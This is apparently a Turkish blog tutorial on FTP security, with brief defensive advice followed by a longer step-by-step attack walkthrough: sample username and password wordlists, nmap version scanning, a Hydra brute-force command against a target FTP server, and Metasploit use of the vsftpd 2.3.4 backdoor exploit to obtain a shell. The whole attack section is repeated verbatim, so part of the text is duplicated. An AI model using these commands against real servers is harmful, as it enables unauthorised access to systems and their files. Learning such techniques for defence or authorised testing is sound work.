Ftp Nedir ?Ftp ( File Transfer Protocol ) Türkçesiyle Dosya Transfer Protokol'u Sunucunuza Veya Hosttan Hostta Dosya Transferi Yapabilirsiniz.Web Serverlarda Dilerseniz Kullanabiliyorsunuz.Ftp Protokolu "21" dir.Ftp Dosya Transferleri Yapan Servis Olduğu İçin Serverınız Web Siteniz Hacklenebilir Bunun İçin Güvenliğini İyi Sağlamanız Gerekmektedir.
Ftp Servisi Güvenliği Nasıl Sağlanır ?Ftp Servisinin Güvenliği Öncelikle Ftp Servisine Yapılabilen Attack Methodlarını Bilmekten Geçer Eğer Nasıl Saldırıldığını Bilirseniz Nasıl Saldırıyı Önliyceğinizide Bilirsiniz. Öncelikle En Yaygın Olanları
Attack Yolu Brute Force ( Kaba Kuvvet Saldırısı ).Exploit ( Açığı İstismar Etmeye Çalışan Yazılan Kod ).
Nedir Brute Force?Brute Force Dediğimiz Muhabbet User Ve Pass'ı Kırmaktır Nasıl Kırar Deneyerek Mesela Useriniz Admin Passwordunuz Admin123Saldırgan Wordlist Hazırlıyor Bunun İçin Toollar Bulunmakta.Wordlist Örnek Olarak User İçin.user.txtusertestrootadmin1admin12admin123admin
Wordlist Örnek Olarak Pass İçin.pass.txtuser1test123test@123admin@123rootroot@123123456123456712345678admin123
Wordlistler Hazır Bunları Deneyip Sizin Ftp Servisinizin User Passını Kırmaya Çalışır Request Gönderip Peki Nasıl Engellenilir?1. Firewall ( Güvenlik Duvarı )2. İnternette Bu Tarz Listler Var Sizin User Ve Pass'ınız Bunlardan Biri Olmasın.3. Ftp Servisinizi Görünür Kılmayın.
Nedir Ftp Exploitleri?
Eğer Sızma Eğitimleri Aldıysanız Biliyorsunuzdur Almadıysanız Hemen Anlatalım.
Exploitler Toollardır Yazılış Amaçlarına Göre İşlev Yaparlar Otonomlardır.
Ftp'ye Göre Yazılmış Olan Exploitler Ftp Servislerinin Versionlarına Göre Yazılmışlardır Bu Versionları Nerden Öğreniyoruz?
Nmap ( Network Mapper ).Ünlü Network Araçlarından Olan Nmap Linux İşletim Sistemlerde Ubuntu İşletim Sistemlerinde Bulunur Hazır.
nmap -sV google.com-sV Parametresi İle Sunucunun Version Bilgisini Alabiliyoruz.
En Çok Karşılaşılan Versionlar.ProftpdPure-FTPdVsftpdMicrosoft-ftpd
Ftp Servisi Nasıl İstismar Edilir ?
Nmap Taramasını Yaptıktan Sonra Ftp Portunun Yani 21. Portun Açık Olduğunu Görüyoruz 
Ardından Brute Force Attack Yapalım İlk
Komut: hydra –l ( burda user biliyorsanız direk user yoksa user list yazın. )
Hydra –l /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://HEDEF.İP
Hydra-gtk Aracı
Linuxun Arama Kısmına hydra gtk Yazın Çıkıcaktır Program Açın.
Açıldıktan Sonra
Single target kısmına hedef ip adresini yazın
Ardından port kısmını 21 yapın
Protocol’u ftp yapın
Output options show attempts kısmında show attempts i seçin ardından
Passwords kısmına gelin.
Wordlist’leri seçin.
Ardından start kısmına gelin.
Brute Force Başlıycak Deniycektir Hepsini Pc Sisteminize Göre Verimlilik Gösterir Brute Hızı.
Ftp Servisini Exploit İle İstismar Etme
Komut Satırına Metasploit'i Çalıştırmak İçin "msfconsole" Yazın.
Ardından search version'u yazın.
Exploit/unix/ftp/vsftpd_234_backdoor’u kopyalayın
Use exploit/unix/ftp/vsftpd_234_backdoor
Yazın exploiti kullanmaya başlamış oluyoruz
Ardından
Show options diyoruz exploitin ayarlarına geliyoruz.
Set rhosts hedef ip adresini yazıyoruz enterlıyoruz.
Show payloads diyoruz.
Set payloads cmd/unix/interact
Yazıp enterlıyoruz payloadımızı seçmiş oluyoruz
Ardından exploit yazıyoruz ve çalıştırıyoruz.
Ve eğer başarılı olduysa ls yazın dosyalar gelcektir o zaman yapmışsınızdır id yazıp yetkinizi
öğrenebilirsiniz.
Ftp Servisi Nasıl İstismar Edilir ?
Ardından Brute Force Attack Yapalım İlk
Komut: hydra –l ( burda user biliyorsanız direk user yoksa user list yazın. )
Hydra –l /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://HEDEF.İP
Hydra-gtk Aracı
Linuxun Arama Kısmına hydra gtk Yazın Çıkıcaktır Program Açın.
Açıldıktan Sonra
Single target kısmına hedef ip adresini yazın
Ardından port kısmını 21 yapın
Protocol’u ftp yapın
Output options show attempts kısmında show attempts i seçin ardından
Passwords kısmına gelin.
Wordlist’leri seçin.
Ardından start kısmına gelin.
Brute Force Başlıycak Deniycektir Hepsini Pc Sisteminize Göre Verimlilik Gösterir Brute Hızı.
Komut Satırına Metasploit'i Çalıştırmak İçin "msfconsole" Yazın.
Ardından search version'u yazın.
Exploit/unix/ftp/vsftpd_234_backdoor’u kopyalayın
Use exploit/unix/ftp/vsftpd_234_backdoor
Yazın exploiti kullanmaya başlamış oluyoruz
Ardından
Show options diyoruz exploitin ayarlarına geliyoruz.
Set rhosts hedef ip adresini yazıyoruz enterlıyoruz.
Show payloads diyoruz.
Set payloads cmd/unix/interact
Yazıp enterlıyoruz payloadımızı seçmiş oluyoruz
Ardından exploit yazıyoruz ve çalıştırıyoruz.
Ve eğer başarılı olduysa ls yazın dosyalar gelcektir o zaman yapmışsınızdır id yazıp yetkinizi
öğrenebilirsiniz.
